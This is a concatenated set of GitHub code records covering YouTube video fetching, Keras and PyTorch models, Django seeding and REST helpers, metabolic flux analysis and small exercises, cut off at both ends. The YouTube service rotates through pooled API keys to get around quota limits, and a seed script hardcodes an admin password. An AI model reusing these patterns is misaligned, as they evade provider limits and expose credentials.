is_exhausted=False)\n if cls.is_api_key_exhausted(api_key.key):\n api_key.is_exhausted = True\n api_key.in_use = False\n api_key.save()\n logger.info(\"API key is exhausted, getting new API key\")\n return cls.get_new_api_key()\n else:\n return api_key.key\n except APIKey.DoesNotExist:\n logger.info(\"No API key available, all API keys are exhausted\")\n\n # Method to get new YouTube API key, if the current API key is exhausted\n @classmethod\n def get_new_api_key(cls):\n new_api_key = APIKey.objects.filter(is_exhausted=False).first()\n if new_api_key:\n new_api_key.in_use = True\n new_api_key.save()\n return new_api_key.key\n else:\n logger.info(\"No API key available\")\n\n # Method to check if API key is exhausted\n @classmethod\n def is_api_key_exhausted(cls, api_key):\n params = {\n \"part\": \"snippet\",\n \"q\": \"cricket\",\n \"key\": api_key,\n \"maxResults\": 10,\n \"order\": \"date\",\n \"fields\": \"items(id(videoId),snippet(publishedAt,thumbnails,title,description))\",\n \"publishedAfter\": datetime.utcfromtimestamp(\n (datetime.now().timestamp())\n ).strftime(\"%Y-%m-%dT%H:%M:%S.0Z\"),\n }\n videos = json.loads(\n requests.request(\"GET\", YOUTUBE_SEARCH_URL, params=params).text\n )\n if videos.get(\"error\"):\n return True\n return False\n\n # Method to fetch latest videos from YouTube and save in the database at an interval of 1 minute\n @classmethod\n def save_youtube_videos(cls):\n while True:\n time.sleep(60)\n api_key = cls.get_api_key()\n Thread(target=search_videos, args=(api_key,)).start()\n\n # Method to renew exhausted YouTube API key\n @classmethod\n def renew_api_key(cls):\n while True:\n time.sleep(86400)\n api_keys = APIKey.objects.filter(is_exhausted=True)\n for api_key in api_keys:\n time_elapsed = (\n datetime.now().timestamp() - api_key.updated_at.timestamp()\n )\n if time_elapsed >= 86400:\n api_key.is_exhausted = False\n api_key.save()\n logger.info(\"API key renewed\")\n","repo_name":"Nishant127/youtube-api","sub_path":"youtube/apps/videos/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"73668852908","text":"import numpy as np\nfrom keras.models import Model\nfrom keras import backend as K\nimport json\nfrom keras.layers import Input, Conv2D, ZeroPadding2D, concatenate, MaxPooling2D, \\\n AveragePooling2D, Dense, Activation, BatchNormalization, GlobalAveragePooling2D, Dropout\nfrom op_library import concat, conv, sp_conv, dw_conv, reduction\n\n\nclass ModelConstructor(object):\n def __init__(self, arc_json, nn_json):\n self.arch = json.loads(arc_json)\n nn_config = json.loads(nn_json)\n self.num_layers = nn_config['num_layers']\n self.input_sizes = nn_config['input_sizes']\n self.output_size = nn_config['output_sizes'][-1]\n self.embedding = nn_config['embedding']\n\n def build_model(self):\n # a list of the data all layers\n all_layers = [0 for _ in range(self.num_layers + 1)]\n # a list of all the dimensions of all layers\n all_dims = [0 for _ in range(self.num_layers + 1)]\n\n # ================= Stacking layers =================\n # Input Layer. Layer 0\n input_layer = Input(shape=self.input_sizes)\n all_layers[0] = input_layer\n\n # Intermediate Layers. 
Starting from layer 1.\n for l in range(1, self.num_layers + 1):\n input_layers = list()\n opt = self.arch[l - 1][0]\n opt_config = self.embedding[str(opt)]\n skip = self.arch[l - 1][1:l+1]\n\n # set up the connection to the previous layer first\n input_layers.append(all_layers[l - 1])\n\n # then add skip connections\n for i in range(l - 1):\n if l > 1 and skip[i] == 1:\n input_layers.append(all_layers[i])\n\n layer_input = concat(input_layers)\n if opt_config['opt_type'] == 'convolution':\n layer_output = conv(layer_input, opt_config)\n if opt_config['opt_type'] == 'separable_convolution':\n layer_output = sp_conv(layer_input, opt_config)\n if opt_config['opt_type'] == 'depthwise_convolution':\n layer_output = dw_conv(layer_input, opt_config)\n elif opt_config['opt_type'] == 'reduction':\n layer_output = reduction(layer_input, opt_config)\n\n all_layers[l] = layer_output\n\n # Final Layer\n # Global Average Pooling, then Fully connected with softmax.\n avgpooled = GlobalAveragePooling2D()(all_layers[self.num_layers])\n dropped = Dropout(0.4)(avgpooled)\n logits = Dense(units=self.output_size,\n activation='softmax')(dropped)\n\n # Encapsulate the model\n self.model = Model(inputs=input_layer, outputs=logits)\n\n return self.model\n","repo_name":"kubeflow/katib","sub_path":"examples/v1beta1/trial-images/enas-cnn-cifar10/ModelConstructor.py","file_name":"ModelConstructor.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","stars":1376,"dataset":"github-code","pt":"37"} +{"seq_id":"1269656767","text":"import os\nimport sys\nimport torch\nimport numpy as np\nimport random\n\n\ndef dice_coeff(pred, target):\n smooth = 1.\n\n p_flat = pred.view(-1) # p is of N,C,H,W\n t_flat = target.view(-1) # t is of N, C, H, W\n intersection = (p_flat * t_flat).sum()\n return ((2. * intersection + smooth) / (p_flat.sum() + t_flat.sum() + smooth)).mean()\n\n\ndef dice_coeff_loss(pred, target):\n return 1 - dice_coeff(pred=pred, target=target)\n\n\ndef dice_loss(true, logits, eps=1e-7):\n \"\"\"Computes the Sørensen–Dice loss.\n Note that PyTorch optimizers minimize a loss. In this\n case, we would like to maximize the dice loss so we\n return the negated dice loss.\n Args:\n true: a tensor of shape [B, 1, H, W].\n logits: a tensor of shape [B, C, H, W]. Corresponds to\n the raw output or logits of the model.\n eps: added to the denominator for numerical stability.\n Returns:\n dice_loss: the Sørensen–Dice loss.\n \"\"\"\n num_classes = logits.shape[1]\n if num_classes == 1:\n true_1_hot = torch.eye(num_classes + 1)[true.squeeze(1)]\n true_1_hot = true_1_hot.permute(0, 3, 1, 2).float()\n true_1_hot_f = true_1_hot[:, 0:1, :, :]\n true_1_hot_s = true_1_hot[:, 1:2, :, :]\n true_1_hot = torch.cat([true_1_hot_s, true_1_hot_f], dim=1)\n pos_prob = torch.sigmoid(logits)\n neg_prob = 1 - pos_prob\n probas = torch.cat([pos_prob, neg_prob], dim=1)\n else:\n true_1_hot = torch.eye(num_classes)[true.squeeze(1)]\n true_1_hot = true_1_hot.permute(0, 3, 1, 2).float()\n probas = F.softmax(logits, dim=1)\n true_1_hot = true_1_hot.type(logits.type())\n dims = (0,) + tuple(range(2, true.ndimension()))\n intersection = torch.sum(probas * true_1_hot, dims)\n cardinality = torch.sum(probas + true_1_hot, dims)\n dice_loss = (2. 
* intersection / (cardinality + eps)).mean()\n return (1 - dice_loss)\n\n\ndef f_beta_loss(pred, gt):\n smooth = 1.\n beta = 2.\n beta_sq = np.square(beta)\n\n p_flat = pred.view(-1)\n g_flat = gt.view(-1)\n\n intersection = (p_flat * g_flat).sum()\n g_backslash_p = ((1 - p_flat) * g_flat).sum()\n p_backslash_g = (p_flat * (1 - g_flat)).sum()\n\n f_beta = (((1 + beta_sq) * intersection + smooth) / (((1 + beta_sq)*intersection) + (beta_sq * g_backslash_p)\n + p_backslash_g + smooth)).mean()\n return 1 - f_beta","repo_name":"Cardio-AI/suture-detection-pytorch","sub_path":"src/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"13902674019","text":"import logging\nimport os\n\nimport django\nfrom django.apps import apps\nfrom django.conf import settings\nfrom django.contrib.auth.hashers import make_password\n\nlogger = logging.getLogger(__name__)\n\n\ndef seed_data():\n from zconnect.testutils.factories import (\n UserFactory, DeviceSensorFactory, SensorTypeFactory,\n DeviceFactory, ProductTagsFactory,\n EventDefinitionFactory, BilledOrganizationFactory,\n )\n from django_demo.testutils.factories import FridgeFactory\n\n product = FridgeFactory()\n\n ProductTagsFactory(\n tag=\"fridge\",\n product=product,\n )\n\n low_temp_boundary = 4\n EventDefinitionFactory(\n product=product,\n ref=\"low box temp\",\n condition=\"process_box_temp<{}\".format(low_temp_boundary),\n actions={\n \"activity\" : {\n \"verb\": \"reported\",\n \"description\": \"Fridge temp is too cold. Less than {}°C\".format(low_temp_boundary),\n \"severity\": 20,\n \"category\": \"business metrics\",\n \"notify\": True\n },\n },\n debounce_window=1, # very short debounce!\n )\n EventDefinitionFactory(\n product=product,\n ref=\"door opened\",\n condition=\"property_door_opened==1\",\n actions={\n \"activity\" : {\n \"verb\": \"reported\",\n \"description\": \"Fridge door has been opened\",\n \"severity\": 20,\n \"category\": \"business metrics\",\n \"notify\": True\n },\n },\n debounce_window=1, # very short debounce!\n )\n EventDefinitionFactory(\n product=product,\n ref=\"door opened\",\n condition=\"property_cold_pipe_leak==1\",\n actions={\n \"activity\" : {\n \"verb\": \"reported\",\n \"description\": \"Fresh cooling liquid pipe is leaking\",\n \"severity\": 20,\n \"category\": \"business metrics\",\n \"notify\": True\n },\n },\n debounce_window=1, # very short debounce!\n )\n EventDefinitionFactory(\n product=product,\n ref=\"door opened\",\n condition=\"property_hot_pipe_leak==1\",\n actions={\n \"activity\" : {\n \"verb\": \"reported\",\n \"description\": \"Used cooling liquid pipe leaking\",\n \"severity\": 20,\n \"category\": \"business metrics\",\n \"notify\": True\n },\n },\n debounce_window=1, # very short debounce!\n )\n\n sensor_types = []\n\n # All sensors for fridge product\n sensor_types.append(SensorTypeFactory(\n sensor_name=\"property_ambient_temp\",\n unit=\"\",\n product=product,\n aggregation_type=\"mean\"\n ))\n sensor_types.append(SensorTypeFactory(\n sensor_name=\"process_box_temp\",\n unit=\"°C\",\n product=product,\n aggregation_type=\"mean\"\n ))\n sensor_types.append(SensorTypeFactory(\n sensor_name=\"process_hot_coolant_temp\",\n unit=\"°C\",\n product=product,\n aggregation_type=\"mean\"\n ))\n sensor_types.append(SensorTypeFactory(\n sensor_name=\"process_cold_coolant_temp\",\n unit=\"°C\",\n product=product,\n aggregation_type=\"mean\"\n ))\n 
sensor_types.append(SensorTypeFactory(\n sensor_name=\"process_current_in\",\n unit=\"Amps\",\n product=product,\n aggregation_type=\"mean\"\n ))\n sensor_types.append(SensorTypeFactory(\n sensor_name=\"property_set_point\",\n unit=\"°C\",\n product=product,\n aggregation_type=\"mean\"\n ))\n sensor_types.append(SensorTypeFactory(\n sensor_name=\"property_door_opened\",\n unit=\"\",\n product=product\n ))\n sensor_types.append(SensorTypeFactory(\n sensor_name=\"property_hot_pipe_leak\",\n unit=\"\",\n product=product\n ))\n sensor_types.append(SensorTypeFactory(\n sensor_name=\"property_cold_pipe_leak\",\n unit=\"\",\n product=product\n ))\n sensor_types.append(SensorTypeFactory(\n sensor_name=\"process_thermostat\",\n unit=\"°C\",\n product=product,\n aggregation_type=\"mean\"\n ))\n\n fake_org = BilledOrganizationFactory(name=\"fake_org\")\n\n device = DeviceFactory(\n id=123,\n product=product,\n name=\"Fridge simulator\",\n # no fw_version\n online=False,\n sim_number=\"8944538525004714414\",\n )\n device.orgs.add(fake_org)\n\n device_sensor_map = {}\n # Loop over all devices and sensors to create 35 device_sensors\n for sensor_type in sensor_types:\n device_sensor = DeviceSensorFactory(\n device=device,\n resolution=900,\n sensor_type=sensor_type,\n )\n # This key should include the resolution for cases where resolution is not constant\n # across all data, but for this case is it\n device_sensor_map[\"{}:{}\".format(device.id, sensor_type.sensor_name)] = device_sensor\n\n # joe seed\n joe = UserFactory()\n # joe.orgs.add(site1)\n joe.add_org(fake_org)\n\n # admin user\n admin = UserFactory(\n username=\"admin@zoetrope.io\",\n email=\"admin@zoetrope.io\",\n is_superuser=True,\n is_staff=True,\n password=make_password(\"SPITURSTUD\"),\n first_name=\"bart\",\n last_name=\"simpson\",\n )\n\n admin.add_org(fake_org)\n\n\ndef seed_project():\n logger.debug(\"Started seeding data\")\n User = apps.get_model(settings.AUTH_USER_MODEL)\n\n try:\n User.objects.filter(username=\"admin@zoetrope.io\").get()\n except User.DoesNotExist:\n pass\n else:\n if os.getenv(\"DJANGO_SEED_PROJECT_ONCE\"):\n logger.debug(\"Not seeding again\")\n return\n else:\n logger.critical(\"Database has already been seeded - seeding again\")\n\n seed_data()\n\n logger.debug(\"Finished seeding data\")\n\n\nif __name__ == \"__main__\":\n django.setup(set_prefix=False)\n seed_project()\n","repo_name":"zconnect-iot/zconnect-django-demo","sub_path":"django_demo/seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":6010,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"8827736225","text":"liste=[1,2,3,4,5]\r\nfor i in liste:\r\n print (i)\r\nprint(range(3,15,3))#range fonksiyonu 3 den baslayarak 15 e kadar 3'er 3'er gider\r\nrange(0,10)#0 dan 10 a kadar ardışık olarak artar\r\n\r\nfor i in range(0,10):\r\n if(i%2==0):\r\n print (i)\r\nstring=\"gollum\"\r\nfor i in string:\r\n print (i)\r\ndemet=(5,3,7,1,7,3,5)\r\nfor i in demet:\r\n print (i*\"*\")\r\n\r\na=0\r\nwhile(a<len(demet)):\r\n print (demet[a])\r\n a=a+1\r\n\r\n","repo_name":"ozguryildiz54/Python-Temel-Seviye-Uygulamalar","sub_path":"Ders-12 For döngüsü.py","file_name":"Ders-12 For döngüsü.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24736907324","text":"import json\nimport os\n\nwith open(\"spotCoordinates.json\", \"w\") as newData:\n newData.write(\"[\")\n\nwith open(\"export.geojson\", 
'r') as data:\n spots = json.load(data)\n i=0\n while i < len(spots[\"features\"]):\n #checks if the spot is a point or a polygon, only accepting points as polygons are annoying to handle\n if spots[\"features\"][i][\"geometry\"][\"type\"] == \"Point\":\n with open(\"spotCoordinates.json\", \"a\") as newData:\n newData.write('\\n\\t{')\n try:\n newData.write('\\n\\t\\t\"n\":\"' + str(spots[\"features\"][i][\"properties\"][\"name\"].replace('\"', '').replace(\"'\", \" \")) + '\",') #.replace in case there is a quotation mark in the name of the spot\n except: #if no name has been set\n newData.write('\\n\\t\\t\"n\":\"u\",')#u stands for undefined\n newData.write('\\n\\t\\t\"o\":' + str(spots[\"features\"][i][\"geometry\"][\"coordinates\"][0]) + ',')#longitude\n newData.write('\\n\\t\\t\"a\":' + str(spots[\"features\"][i][\"geometry\"][\"coordinates\"][1]))#latitude\n newData.write('\\n\\t},')\n i+=1\n\n#removing the last line of the file and replacing it because otherwise there is a comma at the end of the object\nfile_path = \"spotCoordinates.json\"\nos.system('sed -i \"$ d\" {0}'.format(file_path))\n\nwith open(\"spotCoordinates.json\", \"a\") as newData:\n newData.write('\\t}')\n newData.write(\"\\n]\")\n","repo_name":"FrenchGithubUser/Explore-outdoors","sub_path":"cliff_diving/cliff_diving_home/getCoordinates.py","file_name":"getCoordinates.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74652400747","text":"import setuptools\n\nwith open(\"README.md\") as f:\n README = f.read()\n\nsetuptools.setup(\n author=\"Sandro Bolanos\",\n author_email=\"bsandrojavier@gmail.com\",\n 
name=\"api\",\n url = \"www.colosoft.com.co\",\n description=\"interfaces del sistema\",\n version=\"1.0\",\n long_description = README, \n packages= setuptools.find_namespace_packages(), \n zip_safe=False\n)\n\n\n","repo_name":"Moitas500/Proyecto-patrones","sub_path":"componentes/api/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40685707436","text":"import torch\nimport torch.nn.functional as F\nimport data_loader\nfrom torch_geometric.data import DataLoader\nimport numpy as np\nimport time\nimport copy\nimport os\nimport model\n\n\nmax_nodes = 400\nbatch_size = 250\nnum_class = 345\ninput_chanel = 3\nhidden_chanel = 512\nfea_dim = 128\nhidden_chanel2 = 256\nhidden_chanel3 = 512\nout_chanel = 1024\nn_rnn_layer = 2\nnum_epoches = 1\nlearning_rate = 0.001\ndata_dir = '/home/yl/sketchrnn.txt'\nclass_list = '/home/yl/sketchrnn.txt'\ntheta_list = np.load('/home/yl/theta.npy')\ntrain_model_save_dir = '/home/yl/data/train_model/s3net'\nsave_dir = '/home/yl/data/model/s3net.pkl'\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\nprint('='*10, 'Initial Setting', '='*10)\nprint('Batch Size: ', batch_size)\nprint('Data_dir: ', data_dir)\nprint('Input dim: ', input_chanel)\nprint('hidden dim: ', hidden_chanel, ' ', hidden_chanel2, ' ', hidden_chanel3)\nprint('Output dim: ', out_chanel)\nprint('RNN Layers: ', n_rnn_layer)\nprint('Num epochs:', num_epoches)\nprint('Learning rate: ', learning_rate)\nprint('Data_dir :', data_dir)\nprint('Class info: ', class_list)\nprint('Device: ', device)\nprint('Train model save dir: ', train_model_save_dir)\nprint('Final model save path: ', save_dir)\n\n\n\"\"\"\n dataset and data loader\n\"\"\"\nprint('='*10, 'Start Data Loading', '='*10)\ntrain_dataset = data_loader.QuickDraw(data_dir, class_list, theta_list, type='train')\ntrain_loader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True)\nval_dataset = data_loader.QuickDraw(data_dir, class_list, theta_list, type='valid')\nval_loader = DataLoader(val_dataset, batch_size=batch_size, shuffle=True)\nprint('='*10, 'Data Loaded', '='*10)\n\n\n\"\"\"\n model and optimizer\n\"\"\"\n\nmodel = model.Net(input_chanel, hidden_chanel, fea_dim, hidden_chanel2, hidden_chanel3, out_chanel, num_class, n_rnn_layer).to(device)\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\nmodel.load_state_dict(torch.load('/home/yl/data/train_model/s3net/4.pkl'))\n\n\ntrain_loss = []\ntrain_acc = []\nvalid_loss = []\nvalid_acc = []\nbest_acc = 0.0\n\nprint('='*10, 'Start training', '='*10)\n\nfor epoch in range(num_epoches):\n # print('=' * 10, 'Epoch ', epoch, '=' * 10)\n # if epoch == 5:\n # optimizer.param_groups[0]['lr'] = 1e-4\n # if epoch == 10:\n # optimizer.param_groups[0]['lr'] = 1e-5\n # if epoch == 15:\n # optimizer.param_groups[0]['lr'] = 1e-6\n print('learning rate: ', optimizer.param_groups[0]['lr'])\n\n since = time.time()\n running_acc = 0.0\n running_loss = 0.0\n val_loss = 0.0\n val_acc = 0.0\n model.train()\n for i, data in enumerate(train_loader):\n inputs = data\n label = data['y'].to(device).long()\n inputs = inputs.to(device)\n optimizer.zero_grad()\n output, prediction, link_loss, ent_loss = model(inputs)\n loss = F.nll_loss(output, label.view(-1)) + link_loss + ent_loss\n loss.backward()\n running_loss += data.y.size(0) * loss.item()\n optimizer.step()\n _, preds = torch.max(output, 1)\n running_acc += torch.sum(preds == 
label.data)\n        if i % 10 == 0:\n            print('the {}-th batch, loss: {:.6f}, acc: {:.6f}'.format(i, running_loss / (i*inputs.num_graphs + 1),\n                                                                     running_acc.double().cpu() / (i*inputs.num_graphs + 1)))\n    #return loss_all / len(train_dataset)\n    j = running_loss / (len(train_dataset))\n    e = running_acc.double().cpu() / (len(train_dataset))\n    print('Finish {} epoch, Loss:{:.6f}, Acc:{:.6f}'.format(epoch + 1, j, e))\n    train_loss.append(j)\n    train_acc.append(e)\n    time_epoch = time.time() - since\n    print(\"This epoch train costs time:{:.0f}m {:.0f}s\".format(time_epoch // 60, time_epoch % 60))\n\n    model.eval()\n    loss = 0.0\n    for i, data in enumerate(val_loader):\n        inputs = data\n        label = data['y'].to(device).long()\n        inputs = inputs.to(device)\n        output, prediction, link_loss, ent_loss = model(inputs)\n        loss = F.nll_loss(output, label.view(-1)) + link_loss + ent_loss\n        val_loss = val_loss + data.y.size(0) * loss.item()\n        _, preds = torch.max(output, 1)\n        val_acc += torch.sum(preds == label.data)\n    d = val_acc.double().cpu()\n    save_path = os.path.join(train_model_save_dir, str(epoch) + '.pkl')\n    torch.save(model.state_dict(), save_path)\n    c = val_loss / (len(val_dataset))\n    f = d / (len(val_dataset))\n    if f > best_acc:\n        best_acc = f\n        best_model_wts = copy.deepcopy(model.state_dict())\n    print('val: Loss:{:.6f}, Acc:{:.6f}'.format(c, f))\n    valid_loss.append(c)\n    valid_acc.append(f)\n    time_epoch_val = time.time() - since\n    del c, d, f\n    print(\"This epoch val costs time:{:.0f}m {:.0f}s\".format(time_epoch_val // 60, time_epoch_val % 60))\n\n\nmodel.load_state_dict(best_model_wts)\ntorch.save(model.state_dict(), save_dir)\nprint('train_loss:{} train_acc:{} val_loss:{} val_acc:{}'.format(train_loss, train_acc, valid_loss, valid_acc))\n","repo_name":"yanglan0225/s3net","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5018,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"}
{"seq_id":"29468165500","text":"import requests\n\n\nfrom rest_framework.response import Response\nfrom .models import User\nfrom .serializers import UserSerializer\n\n\nurl = 'http://127.0.0.1:8001/api/owner_users/'\n\n\ndef getUsersList(request):\n    users = User.objects.all().order_by('-updated_at')\n    serializer = UserSerializer(users, many=True)\n    return Response(serializer.data)\n\n\ndef createUser(request):\n    data = request.data\n    user = User.objects.create(\n        name = data['name'],\n        email = data['email']\n    )\n    serializer = UserSerializer(user, many=False)\n\n    if serializer:\n        requests.get(url)\n    return Response(serializer.data)\n\ndef getUserDetail(request, pk):\n    users = User.objects.get(id=pk)\n    serializer = UserSerializer(users, many=False)\n    return Response(serializer.data)\n\n\ndef updateUser(request, pk):\n    data = request.data\n    user = User.objects.get(id=pk)\n    serializer = UserSerializer(instance=user, data=data)\n\n    if serializer.is_valid():\n        serializer.save()\n        requests.get(url)\n\n    return Response(serializer.data)\n\n\ndef deleteUser(request, pk):\n    user = User.objects.get(id=pk)\n    user.delete()\n    requests.get(url)\n    return Response('User was deleted successfully!')\n","repo_name":"gasimovv21/AuctionWebsite-Fullstack-Django_React","sub_path":"users_RestAPI_React/users_api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"19697937546","text":"import pandas as pd\nimport numpy as np\nimport cobra\n\nfrom 
pyefm.ElementaryFluxModes import EFMToolWrapper\nfrom tqdm import tqdm\n\nclass EFVWrapper(EFMToolWrapper):\n\n def create_matrices(self, extra_g=None, extra_h=None):\n \"\"\" Initialize the augmented stoichiometric matrix.\n\n extra_g: (n x nr) array\n Extra entries in the constraint matrix. postive values for lower\n bounds, negative values for upper bounds\n extra_h: (n) array\n Corresponding bounds for the extra entries matrix\n\n \"\"\"\n\n # Create stoichiometric matrix, get key dimensions\n N = cobra.util.create_stoichiometric_matrix(self.model)\n nm, nr = N.shape\n self.nm = nm\n self.nr = nr\n\n # Construct full G and h matrices, then drop homogeneous (or near\n # homogeneous) entries\n g_full = np.vstack([np.eye(nr), -np.eye(nr)])\n h_full = np.array([(r.lower_bound, -r.upper_bound)\n for r in self.model.reactions]).T.flatten()\n\n inhomogeneous = ~((h_full <= -1000) | np.isclose(h_full, 0))\n h_full = h_full[inhomogeneous]\n g_full = g_full[inhomogeneous]\n\n if extra_g is not None:\n assert extra_g.shape[1] == nr\n assert extra_g.shape[0] == len(extra_h)\n\n g_full = np.vstack([g_full, extra_g])\n h_full = np.hstack([h_full, extra_h])\n\n G = g_full\n h = h_full\n\n self.nt = nt = len(h)\n\n self.D = np.vstack([\n np.hstack([N, np.zeros((nm, nt)), np.zeros((nm, 1))]),\n np.hstack([G, -np.eye(nt), np.atleast_2d(-h).T])\n ])\n\n def create_model_files(self, temp_dir):\n\n # Stoichiometric Matrix\n np.savetxt(temp_dir + '/stoich.txt', self.D, delimiter='\\t')\n\n # Reaction reversibilities\n np.savetxt(\n temp_dir + '/revs.txt', np.hstack([\n np.array([r.lower_bound < 0 for r in self.model.reactions]),\n np.zeros((self.nt + 1))]),\n delimiter='\\t', fmt='%d', newline='\\t')\n\n # Reaction Names\n r_names = np.hstack([\n np.array([r.id for r in self.model.reactions]),\n np.array(['s{}'.format(i) for i in range(self.nt)]),\n np.array(['lambda'])\n ])\n with open(temp_dir + '/rnames.txt', 'w') as f:\n f.write('\\t'.join(('\"{}\"'.format(name) for name in r_names)))\n\n # Metabolite Names\n m_names = np.hstack([\n np.array([m.id for m in self.model.metabolites]),\n np.array(['s{}'.format(i) for i in range(self.nt)]),\n ])\n with open(temp_dir + '/mnames.txt', 'w') as f:\n f.write('\\t'.join(('\"{}\"'.format(name) for name in m_names)))\n\n pass\n\n def read_double_out(self, out_file):\n with open(out_file, 'rb') as f:\n out_arr = np.fromstring(f.read()[13:], dtype='>d').reshape(\n (-1, self.nt + self.nr + 1)).T\n out_arr = np.asarray(out_arr, dtype=np.float64).T\n\n # Sort by the absolute value of the stoichiometry\n sort_inds= np.abs(out_arr[:, :self.nr]).sum(1).argsort()\n out_arr = out_arr[sort_inds]\n\n unbounded = out_arr[np.isclose(out_arr[:,-1], 0.)]\n bounded = out_arr[~np.isclose(out_arr[:,-1], 0.)]\n\n if bounded.size: # Test if its empty\n bounded /= np.atleast_2d(bounded[:,-1]).T\n\n unbounded_df = pd.DataFrame(\n unbounded[:, :self.nr], \n columns=[r.id for r in self.model.reactions],\n index=['UEV{}'.format(i) \n for i in range(1, unbounded.shape[0] + 1)])\n\n bounded_df = pd.DataFrame(\n bounded[:, :self.nr], \n columns=[r.id for r in self.model.reactions],\n index=('BEV{}'.format(i) \n for i in range(1, bounded.shape[0] + 1)))\n\n return unbounded_df.append(bounded_df)\n \n\ndef calculate_elementary_vectors(cobra_model, opts=None, verbose=True,\n java_args=None, extra_g=None, extra_h=None):\n \"\"\"Calculate elementary flux vectors, which capture arbitrary linear\n constraints. Approach as detailed in S. Klamt et al., PLoS Comput Biol. 
13,\n    e1005409–22 (2017).\n\n    Augmented constraints as a hacky workaround for implementing more\n    complicated constraints without using optlang.\n\n    java_args: string\n        Extra command-line options to pass to the java virtual machine.\n        Eg. '-Xmx1g' will set the heap space to 1 GB.\n    \n    extra_g: (n x nr) array\n        Extra entries in the constraint matrix. positive values for lower\n        bounds, negative values for upper bounds\n    extra_h: (n) array\n        Corresponding bounds for the extra entries matrix\n\n    \"\"\"\n    efv_wrap = EFVWrapper(cobra_model, opts, verbose, java_args=java_args)\n    efv_wrap.create_matrices(extra_g=extra_g, extra_h=extra_h)\n    return efv_wrap()\n    \n\ndef get_support_minimal(efvs):\n    \"\"\"Return only those elementary flux vectors whose support is not a proper\n    superset of another EFV\"\"\"\n    \n    bool_df = pd.DataFrame(np.isclose(efvs, 0),\n                           columns=efvs.columns, index=efvs.index)\n    set_df = bool_df.apply(lambda x: set(x.index[~x]), 1)\n    set_df = set_df[set_df != set()]  # Drop the empty set EFV\n    set_dict = set_df.to_dict() \n    \n    is_support_minimal = _get_support_minimal_list(set_dict)\n\n    return efvs.loc[is_support_minimal]\n\n\ndef _get_support_minimal_list(set_dict):\n\n    all_keys = set(set_dict.keys())\n    is_support_minimal = []\n\n    for this_key, val in tqdm(set_dict.items()):\n\n        for key in all_keys.difference(set([this_key])):\n            if val.issuperset(set_dict[key]):\n                break\n        else:\n            is_support_minimal.append(this_key)\n\n    return is_support_minimal\n","repo_name":"pstjohn/pyefm","sub_path":"pyefm/ElementaryFluxVectors.py","file_name":"ElementaryFluxVectors.py","file_ext":"py","file_size_in_byte":5857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"14751075970","text":"import pytest\n\nfrom storage.kv_store import KeyValueStorage\nfrom storage.kv_store_leveldb import KeyValueStorageLeveldb\nfrom storage.kv_store_rocksdb import KeyValueStorageRocksdb\n\ndb_no = 0\n\n\n@pytest.yield_fixture(params=['rocksdb', 'leveldb'])\ndef storage(request, tdir) -> KeyValueStorage:\n    global db_no\n    if request.param == 'leveldb':\n        db = KeyValueStorageLeveldb(tdir, 'metrics_ldb_{}'.format(db_no))\n    else:\n        db = KeyValueStorageRocksdb(tdir, 'metrics_rdb_{}'.format(db_no))\n    db_no += 1\n    yield db\n    db.close()\n","repo_name":"scipsycho/MADBTC","sub_path":"Indy/indy-plenum/plenum/test/metrics/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"10741240759","text":"\"\"\"\nGiven an array nums, write a function to move all 0's to the end of it while maintaining the relative order of the non-zero elements.\n\nExample:\n\nInput: [0,1,0,3,12]\nOutput: [1,3,12,0,0]\nNote:\n\nYou must do this in-place without making a copy of the array.\nMinimize the total number of operations.\n\"\"\"\n\n\nclass Solution:\n    @staticmethod\n    def moveZeros(nums) -> None:\n        \"\"\"\n        Do not return anything, modify nums in-place instead.\n        \"\"\"\n        if not nums:\n            return None\n        slow = 0\n        for i in range(len(nums)):\n            if nums[i] != 0:\n                nums[slow] = nums[i]\n                slow += 1\n        for i in range(slow, len(nums)):\n            nums[i] = 0\n\n    def moveZeros1(self, nums) -> None:\n        if not nums:\n            return None\n        j = 0\n        for i in range(len(nums)):\n            if nums[i] != 0:\n                if i > j:\n                    nums[j] = nums[i]\n                    nums[i] = 0\n                j += 1\n","repo_name":"GeorgeDaiz/my_python","sub_path":"Leetcode/Array-Str/283.move-zeros.py","file_name":"283.move-zeros.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"41648617212","text":"\"\"\"\nThis class models the 
